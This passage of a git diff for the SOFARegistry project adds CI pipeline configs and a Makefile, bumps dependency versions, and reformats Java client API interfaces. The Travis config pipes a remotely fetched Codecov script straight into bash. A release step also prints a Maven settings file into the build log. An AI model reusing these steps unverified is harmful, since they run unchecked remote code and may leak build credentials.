diff --git a/.aci.yml b/.aci.yml new file mode 100644 index 000000000..39147b212 --- /dev/null +++ b/.aci.yml @@ -0,0 +1,60 @@ +stages: # 定义了一条pipeline + - 代码检测 # 定义了stage + - 测试 + - 编译 + + #- 发布JAR包 + +PMD扫描: # 定义了一个job + stage: 代码检测 # 绑定到stage + plugin: PMD # 指定使用的插件 + checkRule: # 校验结果 + - pmd1 = 0 && pmd2 = 0 + +STC扫描: + stage: 代码检测 + plugin: STC + checkRule: + - stc = 0 + +# see https://yuque.antfin.com/linke/help/kg1p34#pBvc2 +单元测试: + stage: 测试 + plugin: LINKQ-UT # java单元测试插件 + checkRule: + - passRate = 100 + tools: + jdk: '1.8' #jdk版本枚举:1.6、1.7、1.8 + maven: 3.2.5 + parameters: + encoding: UTF-8 # 编码设置 + COVERAGE_EXCLUSIONS: '**/bootstrap/**,**/integration/**,**/client/pb/**,**/MetaApplication,**/registry/jraft/**,**/DataApplication,**/SessionApplication' # 覆盖率排除 + pluginConfig: + markdown: admin/result.md # 向页面输出一些自定义内容 + aciTags: 8G + +#see https://code.alipay.com/common_release/avatarpoc/blob/master/.aci.test.yml +集成测试: + stage: 测试 + plugin: LINKQ-IT # java集成测试插件 + checkRule: + - passRate = 100 + tools: + jdk: '1.8' + parameters: + encoding: UTF-8 # 编码设置 + pluginConfig: + privateRepo: false, # 是否是私有仓库 + parallelCount: 1 # 并发执行个数 + enableOracle: false # 是否依赖Oracle + +编译: + stage: 编译 + plugin: ANT-BUILD # 使用插件ANT-BUILD + pluginConfig: + image: reg.docker.alibaba-inc.com/antb/sofa-build:0.0.2 + script: + - export PATH=$PATH:/opt/taobao/java/bin:/opt/taobao/maven/bin + - java -version + - mvn -version + - mvn clean package -Dmaven.test.skip=true -Pdev diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml new file mode 100644 index 000000000..73ca425dc --- /dev/null +++ b/.github/workflows/maven.yml @@ -0,0 +1,28 @@ +# This workflow will build a Java project with Maven +# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-maven + +name: Java CI with Maven + +on: + push: + branches: [ master ] + pull_request: + branches: [ master ] + +jobs: + build: + + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v2 + - name: Set up JDK 1.8 + uses: actions/setup-java@v1 + with: + java-version: 1.8 + - name: Build with Maven + run: mvn clean install -DskipTests -B -V + && sh ./tools/check_format.sh + && mvn clean test + - name: Codecov + uses: codecov/codecov-action@v1 diff --git a/.gitignore b/.gitignore index 16bfcdc69..d1dfb0c2f 100644 --- a/.gitignore +++ b/.gitignore @@ -16,4 +16,5 @@ dependency-reduced-pom.xml # log logs/ -*.log \ No newline at end of file +*.log +LOG_HOME_IS_UNDEFINED diff --git a/.master.aci.yml b/.master.aci.yml new file mode 100644 index 000000000..a613d1ed6 --- /dev/null +++ b/.master.aci.yml @@ -0,0 +1,65 @@ +stages: # 定义了一条pipeline + - 代码检测 # 定义了stage + - 测试 + - 编译 + - 发布JAR包 + +PMD扫描: # 定义了一个job + stage: 代码检测 # 绑定到stage + plugin: PMD # 指定使用的插件 + checkRule: # 校验结果 + - pmd1 = 0 && pmd2 = 0 + +STC扫描: + stage: 代码检测 + plugin: STC + checkRule: + - stc = 0 + +单元测试: + stage: 测试 + plugin: LINKQ-UT # java单元测试插件 + checkRule: + - passRate = 100 + pluginConfig: + markdown: admin/result.md # 向页面输出一些自定义内容 + +#see https://code.alipay.com/common_release/avatarpoc/blob/master/.aci.test.yml +集成测试: + stage: 测试 + plugin: LINKQ-IT # java集成测试插件 + checkRule: + - passRate = 100 + tools: + jdk: '1.8' + parameters: + encoding: UTF-8 # 编码设置 + pluginConfig: + privateRepo: false, # 是否是私有仓库 + parallelCount: 1 # 并发执行个数 + enableOracle: false # 是否依赖Oracle + +编译: + stage: 编译 + plugin: ANT-BUILD # 使用插件ANT-BUILD + pluginConfig: + image: reg.docker.alibaba-inc.com/antb/sofa-build:0.0.2 + script: + - export PATH=$PATH:/opt/taobao/java/bin:/opt/taobao/maven/bin + - java -version + - mvn -version + - mvn clean package -Dmaven.test.skip=true -Pdev + +发布JAR包: + stage: 发布JAR包 + plugin: ANT-BUILD + pluginConfig: + image: reg.docker.alibaba-inc.com/antb/jarbuild:0.0.1 + script: + - java -version + - mvn -version + - sed -i '//,/<\/mirrors>/d' /opt/taobao/maven_settings/settings-release.xml + - sed -i '//,/<\/profiles>/d' /opt/taobao/maven_settings/settings-release.xml + - echo '#############relase' + - cat /opt/taobao/maven_settings/settings-release.xml + - mvn clean deploy -Dmaven.test.skip=true -s /opt/taobao/maven_settings/settings-release.xml -Pdev -Pantcode-release \ No newline at end of file diff --git a/.travis.yml b/.travis.yml index cb53cacfe..e8363e468 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,6 +1,8 @@ language: java sudo: false +dist: trusty + jdk: - oraclejdk8 @@ -12,4 +14,4 @@ script: - sh ./tools/check_format.sh after_success: -- bash <(curl -s https://codecov.io/bash) \ No newline at end of file +- bash <(curl -s https://codecov.io/bash) diff --git a/Makefile b/Makefile new file mode 100644 index 000000000..17a0865f2 --- /dev/null +++ b/Makefile @@ -0,0 +1,2 @@ +proto: + protoc-3.5.1 --proto_path=./server/common/model/src/main/resources/proto --java_out=server/common/model/src/main/java server/common/model/src/main/resources/proto/*.proto diff --git a/README.md b/README.md index c37c604a2..e589ab84e 100644 --- a/README.md +++ b/README.md @@ -1,13 +1,13 @@ # SOFARegistry -[![Build Status](https://travis-ci.com/alipay/sofa-registry.svg?branch=master)](https://travis-ci.com/alipay/sofa-registry) +[![Java CI with Maven](https://github.com/sofastack/sofa-registry/actions/workflows/maven.yml/badge.svg)](https://github.com/sofastack/sofa-registry/actions/workflows/maven.yml) ![license](https://img.shields.io/badge/license-Apache--2.0-green.svg) -[![Coverage Status](https://codecov.io/gh/alipay/sofa-registry/branch/master/graph/badge.svg)](https://codecov.io/gh/alipay/sofa-registry) -![maven](https://img.shields.io/github/release/alipay/sofa-registry.svg) +[![Coverage Status](https://codecov.io/gh/alipay/sofa-registry/branch/master/graph/badge.svg)](https://codecov.io/gh/sofastack/sofa-registry) +![maven](https://img.shields.io/github/release/sofastack/sofa-registry.svg) SOFARegistry 是蚂蚁金服开源的一个生产级、高时效、高可用的服务注册中心。SOFARegistry 最早源自于淘宝的 ConfigServer,十年来,随着蚂蚁金服的业务发展,注册中心架构已经演进至第五代。目前 SOFARegistry 不仅全面服务于蚂蚁金服的自有业务,还随着蚂蚁金融科技服务众多合作伙伴,同时也兼容开源生态。SOFARegistry 采用 AP 架构,支持秒级时效性推送,同时采用分层架构支持无限水平扩展。 -## 功能特性 +## 功能特性 - 支持服务发布与服务订阅 - 支持服务变更时的主动推送 diff --git a/client/all/pom.xml b/client/all/pom.xml index 9ab6a12dd..0b48a8f37 100644 --- a/client/all/pom.xml +++ b/client/all/pom.xml @@ -6,7 +6,7 @@ com.alipay.sofa registry-client-all - 5.2.0-SNAPSHOT + 6.0.1 ${project.groupId}:${project.artifactId} http://github.com/alipay/sofa-registry @@ -52,11 +52,11 @@ 1.6 1.6 UTF-8 - 1.4.6 - 3.3.6 + 1.6.2 + 3.3.8 1.5.2 1.0.12 - 4.1.25.Final + 4.1.42.Final 1.7.21 ../../ diff --git a/client/api/pom.xml b/client/api/pom.xml index b4f43b84b..3464d3eb8 100644 --- a/client/api/pom.xml +++ b/client/api/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-client-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/ConfigDataObserver.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/ConfigDataObserver.java index 97d92b794..f1b782a00 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/ConfigDataObserver.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/ConfigDataObserver.java @@ -20,16 +20,17 @@ /** * The interface Persistence data observer. + * * @author zhuoyu.sjw * @version $Id : ConfigDataObserver.java, v 0.1 2018-04-17 17:02 zhuoyu.sjw Exp $$ */ public interface ConfigDataObserver { - /** - * Handle data. - * - * @param dataId the data id - * @param configData the persistence data - */ - void handleData(String dataId, ConfigData configData); + /** + * Handle data. + * + * @param dataId the data id + * @param configData the persistence data + */ + void handleData(String dataId, ConfigData configData); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Configurator.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Configurator.java index e9641f713..4766141a9 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Configurator.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Configurator.java @@ -20,29 +20,30 @@ /** * The interface Configurator. + * * @author zhuoyu.sjw * @version $Id : Configurator.java, v 0.1 2018-04-17 17:26 zhuoyu.sjw Exp $$ */ public interface Configurator extends Register { - /** - * Gets data observer. - * - * @return the data observer - */ - ConfigDataObserver getDataObserver(); + /** + * Gets data observer. + * + * @return the data observer + */ + ConfigDataObserver getDataObserver(); - /** - * Sets config data observer. - * - * @param configDataObserver the config data observer - */ - void setDataObserver(ConfigDataObserver configDataObserver); + /** + * Sets config data observer. + * + * @param configDataObserver the config data observer + */ + void setDataObserver(ConfigDataObserver configDataObserver); - /** - * Peek data config data. - * - * @return the config data - */ - ConfigData peekData(); + /** + * Peek data config data. + * + * @return the config data + */ + ConfigData peekData(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventBus.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventBus.java index f9ded1234..db26ab24a 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventBus.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventBus.java @@ -20,46 +20,47 @@ /** * The interface Event bus. + * * @author zhuoyu.sjw * @version $Id : EventBus.java, v 0.1 2018-07-12 21:11 zhuoyu.sjw Exp $$ */ public interface EventBus { - /** - * Is enable boolean. - * - * @return the boolean - */ - boolean isEnable(); + /** + * Is enable boolean. + * + * @return the boolean + */ + boolean isEnable(); - /** - * Is enable boolean. - * - * @param eventClass the event class - * @return the boolean - */ - boolean isEnable(Class eventClass); + /** + * Is enable boolean. + * + * @param eventClass the event class + * @return the boolean + */ + boolean isEnable(Class eventClass); - /** - * Register. - * - * @param eventClass the event class - * @param eventSubscriber the event subscriber - */ - void register(Class eventClass, EventSubscriber eventSubscriber); + /** + * Register. + * + * @param eventClass the event class + * @param eventSubscriber the event subscriber + */ + void register(Class eventClass, EventSubscriber eventSubscriber); - /** - * Un register. - * - * @param eventClass the event class - * @param eventSubscriber the event subscriber - */ - void unRegister(Class eventClass, EventSubscriber eventSubscriber); + /** + * Un register. + * + * @param eventClass the event class + * @param eventSubscriber the event subscriber + */ + void unRegister(Class eventClass, EventSubscriber eventSubscriber); - /** - * Post event. - * - * @param event the event - */ - void post(final Event event); + /** + * Post event. + * + * @param event the event + */ + void post(final Event event); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventSubscriber.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventSubscriber.java index ead4f7ddf..b6557c51e 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventSubscriber.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/EventSubscriber.java @@ -20,22 +20,23 @@ /** * The interface Event subscriber. + * * @author zhuoyu.sjw * @version $Id : EventSubscriber.java, v 0.1 2018-07-12 21:12 zhuoyu.sjw Exp $$ */ public interface EventSubscriber { - /** - * Is sync boolean. - * - * @return the boolean - */ - boolean isSync(); + /** + * Is sync boolean. + * + * @return the boolean + */ + boolean isSync(); - /** - * On event. - * - * @param event the event - */ - void onEvent(Event event); + /** + * On event. + * + * @param event the event + */ + void onEvent(Event event); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Publisher.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Publisher.java index 45330b543..c21b843e3 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Publisher.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Publisher.java @@ -24,10 +24,10 @@ */ public interface Publisher extends Register { - /** - * Publish. - * - * @param data the data - */ - void republish(String... data); + /** + * Publish. + * + * @param data the data + */ + void republish(String... data); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Register.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Register.java index 832fdcb77..98abc196c 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Register.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Register.java @@ -18,60 +18,57 @@ /** * The interface Register. + * * @author zhuoyu.sjw * @version $Id : Register.java, v 0.1 2017-11-22 16:00 zhuoyu.sjw Exp $$ */ public interface Register { - /** - * Reset. - */ - void reset(); + /** Reset. */ + void reset(); - /** - * Is registered boolean. - * - * @return the boolean - */ - boolean isRegistered(); + /** + * Is registered boolean. + * + * @return the boolean + */ + boolean isRegistered(); - /** - * Unregister. - */ - void unregister(); + /** Unregister. */ + void unregister(); - /** - * Gets data id. - * - * @return String data id - */ - String getDataId(); + /** + * Gets data id. + * + * @return String data id + */ + String getDataId(); - /** - * Gets group. - * - * @return the group - */ - String getGroup(); + /** + * Gets group. + * + * @return the group + */ + String getGroup(); - /** - * Gets regist id. - * - * @return the regist id - */ - String getRegistId(); + /** + * Gets regist id. + * + * @return the regist id + */ + String getRegistId(); - /** - * Is enabled boolean. - * - * @return boolean boolean - */ - boolean isEnabled(); + /** + * Is enabled boolean. + * + * @return boolean boolean + */ + boolean isEnabled(); - /** - * Gets timestamp. - * - * @return the timestamp - */ - long getTimestamp(); + /** + * Gets timestamp. + * + * @return the timestamp + */ + long getTimestamp(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClient.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClient.java index 29d3ac8cc..8ac8d008c 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClient.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClient.java @@ -23,43 +23,44 @@ /** * The interface Registry client. + * * @author zhuoyu.sjw * @version $Id : RegistryClient.java, v 0.1 2017-11-20 18:16 zhuoyu.sjw Exp $$ */ public interface RegistryClient { - /** - * Register publisher. - * - * @param registration the registration - * @param data the data - * @return the publisher - */ - Publisher register(PublisherRegistration registration, String... data); + /** + * Register publisher. + * + * @param registration the registration + * @param data the data + * @return the publisher + */ + Publisher register(PublisherRegistration registration, String... data); - /** - * Register multi subscriber multi. - * - * @param registration the registration - * @return the subscriber multi - */ - Subscriber register(SubscriberRegistration registration); + /** + * Register multi subscriber multi. + * + * @param registration the registration + * @return the subscriber multi + */ + Subscriber register(SubscriberRegistration registration); - /** - * Register configurator. - * - * @param registration the registration - * @return the configurator - */ - Configurator register(ConfiguratorRegistration registration); + /** + * Register configurator. + * + * @param registration the registration + * @return the configurator + */ + Configurator register(ConfiguratorRegistration registration); - /** - * Unregister all publishers or subscribers belong to dataId. - * - * @param dataId the data id - * @param group registration group, use default group if null - * @param registryType the registry type, publisher or subscriber - * @return unregister total registers - */ - int unregister(String dataId, String group, RegistryType registryType); + /** + * Unregister all publishers or subscribers belong to dataId. + * + * @param dataId the data id + * @param group registration group, use default group if null + * @param registryType the registry type, publisher or subscriber + * @return unregister total registers + */ + int unregister(String dataId, String group, RegistryType registryType); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClientConfig.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClientConfig.java index 6097d53ac..efa4393d4 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClientConfig.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/RegistryClientConfig.java @@ -18,155 +18,156 @@ /** * The interface Registry client config. + * * @author zhuoyu.sjw * @version $Id : RegistryClientConfig.java, v 0.1 2017-11-23 19:52 zhuoyu.sjw Exp $$ */ public interface RegistryClientConfig { - /** - * Gets env. - * - * @return the env - */ - String getEnv(); - - /** - * Gets instance id. - * - * @return the instance id - */ - String getInstanceId(); - - /** - * Gets cell. - * - * @return the cell - */ - String getZone(); - - /** - * Gets registry endpoint. - * - * @return the registry endpoint - */ - String getRegistryEndpoint(); - - /** - * Gets registry endpoint port. - * - * @return the registry endpoint port - */ - int getRegistryEndpointPort(); - - /** - * Gets data center. - * - * @return the data center - */ - String getDataCenter(); - - /** - * Gets app name. - * - * @return the app name - */ - String getAppName(); - - /** - * Gets connect timeout. - * - * @return the connect timeout - */ - int getConnectTimeout(); - - /** - * Gets socket timeout. - * - * @return the socket timeout - */ - int getSocketTimeout(); - - /** - * Gets invoke timeout. - * - * @return the invoke timeout - */ - int getInvokeTimeout(); - - /** - * Gets recheck interval. - * - * @return the recheck interval - */ - int getRecheckInterval(); - - /** - * Gets observer thread core size. - * - * @return the observer thread core size - */ - int getObserverThreadCoreSize(); - - /** - * Gets observer thread max size. - * - * @return the observer thread max size - */ - int getObserverThreadMaxSize(); - - /** - * Gets observer thread queue length. - * - * @return the observer thread queue length - */ - int getObserverThreadQueueLength(); - - /** - * Gets observer callback timeout. - * - * @return the observer callback timeout - */ - int getObserverCallbackTimeout(); - - /** - * Gets sync config retry interval. - * - * @return the sync config retry interval - */ - int getSyncConfigRetryInterval(); - - /** - * Gets access key. - * - * @return the access key - */ - String getAccessKey(); - - /** - * Gets secret key. - * - * @return the secret key - */ - String getSecretKey(); - - /** - * Gets algorithm. - * - * @return the algorithm - */ - String getAlgorithm(); - - /** - * Gets auth cache interval. - * - * @return the auth cache interval - */ - long getAuthCacheInterval(); - - /** - * Is event bus enable boolean. - * - * @return the boolean - */ - boolean isEventBusEnable(); + /** + * Gets env. + * + * @return the env + */ + String getEnv(); + + /** + * Gets instance id. + * + * @return the instance id + */ + String getInstanceId(); + + /** + * Gets cell. + * + * @return the cell + */ + String getZone(); + + /** + * Gets registry endpoint. + * + * @return the registry endpoint + */ + String getRegistryEndpoint(); + + /** + * Gets registry endpoint port. + * + * @return the registry endpoint port + */ + int getRegistryEndpointPort(); + + /** + * Gets data center. + * + * @return the data center + */ + String getDataCenter(); + + /** + * Gets app name. + * + * @return the app name + */ + String getAppName(); + + /** + * Gets connect timeout. + * + * @return the connect timeout + */ + int getConnectTimeout(); + + /** + * Gets socket timeout. + * + * @return the socket timeout + */ + int getSocketTimeout(); + + /** + * Gets invoke timeout. + * + * @return the invoke timeout + */ + int getInvokeTimeout(); + + /** + * Gets recheck interval. + * + * @return the recheck interval + */ + int getRecheckInterval(); + + /** + * Gets observer thread core size. + * + * @return the observer thread core size + */ + int getObserverThreadCoreSize(); + + /** + * Gets observer thread max size. + * + * @return the observer thread max size + */ + int getObserverThreadMaxSize(); + + /** + * Gets observer thread queue length. + * + * @return the observer thread queue length + */ + int getObserverThreadQueueLength(); + + /** + * Gets observer callback timeout. + * + * @return the observer callback timeout + */ + int getObserverCallbackTimeout(); + + /** + * Gets sync config retry interval. + * + * @return the sync config retry interval + */ + int getSyncConfigRetryInterval(); + + /** + * Gets access key. + * + * @return the access key + */ + String getAccessKey(); + + /** + * Gets secret key. + * + * @return the secret key + */ + String getSecretKey(); + + /** + * Gets algorithm. + * + * @return the algorithm + */ + String getAlgorithm(); + + /** + * Gets auth cache interval. + * + * @return the auth cache interval + */ + long getAuthCacheInterval(); + + /** + * Is event bus enable boolean. + * + * @return the boolean + */ + boolean isEventBusEnable(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Subscriber.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Subscriber.java index fbcae869f..61632f3e5 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/Subscriber.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/Subscriber.java @@ -27,31 +27,31 @@ */ public interface Subscriber extends Register { - /** - * Gets data observer. - * - * @return the data observer - */ - SubscriberDataObserver getDataObserver(); + /** + * Gets data observer. + * + * @return the data observer + */ + SubscriberDataObserver getDataObserver(); - /** - * Sets data observer. - * - * @param observer the observer - */ - void setDataObserver(SubscriberDataObserver observer); + /** + * Sets data observer. + * + * @param observer the observer + */ + void setDataObserver(SubscriberDataObserver observer); - /** - * Peek data user data multi. - * - * @return the user data multi - */ - UserData peekData(); + /** + * Peek data user data multi. + * + * @return the user data multi + */ + UserData peekData(); - /** - * Gets scope enum. - * - * @return the scope enum - */ - ScopeEnum getScopeEnum(); + /** + * Gets scope enum. + * + * @return the scope enum + */ + ScopeEnum getScopeEnum(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/SubscriberDataObserver.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/SubscriberDataObserver.java index d90c33995..d68f15275 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/SubscriberDataObserver.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/SubscriberDataObserver.java @@ -26,11 +26,11 @@ */ public interface SubscriberDataObserver { - /** - * Handle data. - * - * @param dataId the data id - * @param data the data - */ - void handleData(String dataId, UserData data); + /** + * Handle data. + * + * @param dataId the data id + * @param data the data + */ + void handleData(String dataId, UserData data); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/DuplicateException.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/DuplicateException.java index 3b77f4a10..f927f723b 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/DuplicateException.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/DuplicateException.java @@ -18,45 +18,43 @@ /** * The type Duplicate exception. + * * @author zhuoyu.sjw * @version $Id : DuplicateException.java, v 0.1 2017-11-30 19:46 zhuoyu.sjw Exp $$ */ public class DuplicateException extends IllegalArgumentException { - /** UID */ - private static final long serialVersionUID = 167969795120169890L; + /** UID */ + private static final long serialVersionUID = 167969795120169890L; - /** - * Instantiates a new Duplicate exception. - */ - public DuplicateException() { - } + /** Instantiates a new Duplicate exception. */ + public DuplicateException() {} - /** - * Instantiates a new Duplicate exception. - * - * @param s the s - */ - public DuplicateException(String s) { - super(s); - } + /** + * Instantiates a new Duplicate exception. + * + * @param s the s + */ + public DuplicateException(String s) { + super(s); + } - /** - * Instantiates a new Duplicate exception. - * - * @param message the message - * @param cause the cause - */ - public DuplicateException(String message, Throwable cause) { - super(message, cause); - } + /** + * Instantiates a new Duplicate exception. + * + * @param message the message + * @param cause the cause + */ + public DuplicateException(String message, Throwable cause) { + super(message, cause); + } - /** - * Instantiates a new Duplicate exception. - * - * @param cause the cause - */ - public DuplicateException(Throwable cause) { - super(cause); - } + /** + * Instantiates a new Duplicate exception. + * + * @param cause the cause + */ + public DuplicateException(Throwable cause) { + super(cause); + } } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/RegistryClientException.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/RegistryClientException.java index 5b4c85897..304a6e5cb 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/RegistryClientException.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/exception/RegistryClientException.java @@ -18,45 +18,43 @@ /** * The type Registry client exception. + * * @author zhuoyu.sjw * @version $Id : RegistryClientException.java, v 0.1 2017-11-30 19:43 zhuoyu.sjw Exp $$ */ public class RegistryClientException extends RuntimeException { - /** UID */ - private static final long serialVersionUID = -1068018180829676315L; + /** UID */ + private static final long serialVersionUID = -1068018180829676315L; - /** - * Instantiates a new Registry client exception. - */ - public RegistryClientException() { - } + /** Instantiates a new Registry client exception. */ + public RegistryClientException() {} - /** - * Instantiates a new Registry client exception. - * - * @param message the message - */ - public RegistryClientException(String message) { - super(message); - } + /** + * Instantiates a new Registry client exception. + * + * @param message the message + */ + public RegistryClientException(String message) { + super(message); + } - /** - * Instantiates a new Registry client exception. - * - * @param message the message - * @param cause the cause - */ - public RegistryClientException(String message, Throwable cause) { - super(message, cause); - } + /** + * Instantiates a new Registry client exception. + * + * @param message the message + * @param cause the cause + */ + public RegistryClientException(String message, Throwable cause) { + super(message, cause); + } - /** - * Instantiates a new Registry client exception. - * - * @param cause the cause - */ - public RegistryClientException(Throwable cause) { - super(cause); - } + /** + * Instantiates a new Registry client exception. + * + * @param cause the cause + */ + public RegistryClientException(Throwable cause) { + super(cause); + } } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/ConfigData.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/ConfigData.java index cf4306044..a2a6d0f83 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/ConfigData.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/ConfigData.java @@ -18,15 +18,16 @@ /** * The interface Persistence data. + * * @author zhuoyu.sjw * @version $Id : ConfigData.java, v 0.1 2018-04-17 17:15 zhuoyu.sjw Exp $$ */ public interface ConfigData { - /** - * Gets data. - * - * @return the data - */ - String getData(); + /** + * Gets data. + * + * @return the data + */ + String getData(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/Event.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/Event.java index 3c8cdbf2b..bcdcd03d6 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/Event.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/Event.java @@ -18,8 +18,8 @@ /** * The interface Event. + * * @author zhuoyu.sjw * @version $Id : Event.java, v 0.1 2018-07-12 21:10 zhuoyu.sjw Exp $$ */ -public interface Event { -} +public interface Event {} diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/RegistryType.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/RegistryType.java index 057ba3be8..3cfa5cea8 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/RegistryType.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/RegistryType.java @@ -17,11 +17,11 @@ package com.alipay.sofa.registry.client.api.model; /** - * * @author zhuoyu.sjw * @version $Id: RegistryType.java, v 0.1 2018-03-13 15:22 zhuoyu.sjw Exp $$ */ public enum RegistryType { - - PUBLISHER, SUBSCRIBER, CONFIGURATOR + PUBLISHER, + SUBSCRIBER, + CONFIGURATOR } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/UserData.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/UserData.java index 46cc2eabd..bec41f8d7 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/UserData.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/model/UserData.java @@ -27,17 +27,17 @@ */ public interface UserData { - /** - * Getter method for property zoneData. - * - * @return property value of zoneData - */ - Map> getZoneData(); + /** + * Getter method for property zoneData. + * + * @return property value of zoneData + */ + Map> getZoneData(); - /** - * Gets local zone. - * - * @return the local zone - */ - String getLocalZone(); + /** + * Gets local zone. + * + * @return the local zone + */ + String getLocalZone(); } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/BaseRegistration.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/BaseRegistration.java index c7e10bf7f..9ce8ed215 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/BaseRegistration.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/BaseRegistration.java @@ -18,77 +18,85 @@ /** * Base registration. + * * @author yeqing.yq * @version $Id : BaseRegistration.java, v 0.1 2018-09-04 11:36 yeqing.yq Exp $$ */ public class BaseRegistration { - protected String dataId; + protected String dataId; - protected String group; + protected String group; - protected String appName; + protected String appName; - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; - } + /** + * Setter method for property dataId. + * + * @param dataId value to be assigned to property dataId + */ + public void setDataId(String dataId) { + this.dataId = dataId; + } - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } + /** + * Getter method for property group. + * + * @return property value of group + */ + public String getGroup() { + return group; + } - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = group; - } + /** + * Setter method for property group. + * + * @param group value to be assigned to property group + */ + public void setGroup(String group) { + this.group = group; + } - /** - * Getter method for property appName. - * - * @return property value of appName - */ - public String getAppName() { - return appName; - } + /** + * Getter method for property appName. + * + * @return property value of appName + */ + public String getAppName() { + return appName; + } - /** - * Setter method for property appName. - * - * @param appName value to be assigned to property appName - */ - public void setAppName(String appName) { - this.appName = appName; - } + /** + * Setter method for property appName. + * + * @param appName value to be assigned to property appName + */ + public void setAppName(String appName) { + this.appName = appName; + } - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "BaseRegistration{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", appName='" + appName + '\'' + '}'; - } + /** @see Object#toString() */ + @Override + public String toString() { + return "BaseRegistration{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", appName='" + + appName + + '\'' + + '}'; + } } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistration.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistration.java index 7e44be10b..48c723cce 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistration.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistration.java @@ -20,48 +20,56 